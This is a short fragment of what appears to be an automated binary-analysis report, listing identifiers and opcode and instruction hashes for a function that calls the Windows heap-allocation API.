                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 112ff40a95d34841388b31947e1cf72a93c39629705f3855c594b603780d5e84
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD416D72A1A64B86FB54AF50E45427EB7A0EB45B40BD88136DA4F43760DFBCE444CB60